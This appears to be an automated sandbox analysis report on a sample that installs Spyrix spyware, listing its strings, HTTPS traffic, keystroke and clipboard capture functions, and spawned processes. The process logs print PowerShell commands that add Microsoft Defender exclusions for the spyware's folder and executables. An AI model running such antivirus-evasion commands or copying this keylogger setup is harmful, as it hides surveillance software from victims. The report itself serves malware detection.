Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2422306843.00000000044CC000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2691175840.0000000000915000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.spyrix.com
Source: spkl.exe, 00000038.00000003.2422306843.00000000044CC000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2691175840.0000000000915000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.spyrix.com/purchase.php?prg=sfk
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.spyrix.com/purchase.php?prg=sfkq
Source: is-1I8EP.tmp.22.dr	String found in binary or memory: https://www.spyrix.com/spyrix-personal-monitor.php
Source: spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.spyrix.come

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.170:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.168:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.8:49725 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_03376312 OpenClipboard,

56_2_03376312

Contains functionality to modify clipboard data

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_03376342 SetClipboardData,

56_2_03376342

Contains functionality to retrieve information about pressed keystrokes

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_03376292 GetAsyncKeyState,

56_2_03376292

Installs a raw input device (often for capturing keystrokes)

Source: spkl.exe, 00000038.00000003.2463770812.0000000004DAE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_00294fb9-0

System Summary

PE file has nameless sections

Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:

Uses regedit.exe to modify the Windows registry

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\183942631522663"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\183942631522663"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd

Contains functionality to call native functions

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_03376252 NtdllDefWindowProc_A,

56_2_03376252

Contains functionality to communicate with device drivers

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_03375FFA: DeviceIoControl,

56_2_03375FFA

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_02CBDC34	7_2_02CBDC34
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_053C6E90	7_2_053C6E90
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_053C0013	7_2_053C0013
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_053C0040	7_2_053C0040
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_053C6E80	7_2_053C6E80
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_053CD937	7_2_053CD937
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_053CD948	7_2_053CD948
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_08EB0D98	7_2_08EB0D98
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_0A660040	7_2_0A660040
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_0A66A920	7_2_0A66A920
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_0A662DF0	7_2_0A662DF0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_008695C1	56_2_008695C1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0338110C	56_2_0338110C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_03380538	56_2_03380538
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_03396654	56_2_03396654
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_033AE88C	56_2_033AE88C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_033A1D50	56_2_033A1D50
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_0037B890	71_2_0037B890
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003720F0	71_2_003720F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_0036A132	71_2_0036A132
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003D0130	71_2_003D0130
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_00384170	71_2_00384170
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003DA140	71_2_003DA140
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_0036A132	71_2_0036A132
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003BA340	71_2_003BA340
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_0038E590	71_2_0038E590
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_0038F5D0	71_2_0038F5D0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_005E85B0	71_2_005E85B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_00370620	71_2_00370620
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003B66B0	71_2_003B66B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003836A0	71_2_003836A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003976C0	71_2_003976C0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003BA7B0	71_2_003BA7B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003959E0	71_2_003959E0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_00379A20	71_2_00379A20
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_00392A9D	71_2_00392A9D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003D8C20	71_2_003D8C20
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_00389D10	71_2_00389D10
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_0036A132	71_2_0036A132
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_00361F10	71_2_00361F10
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_00376F90	71_2_00376F90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
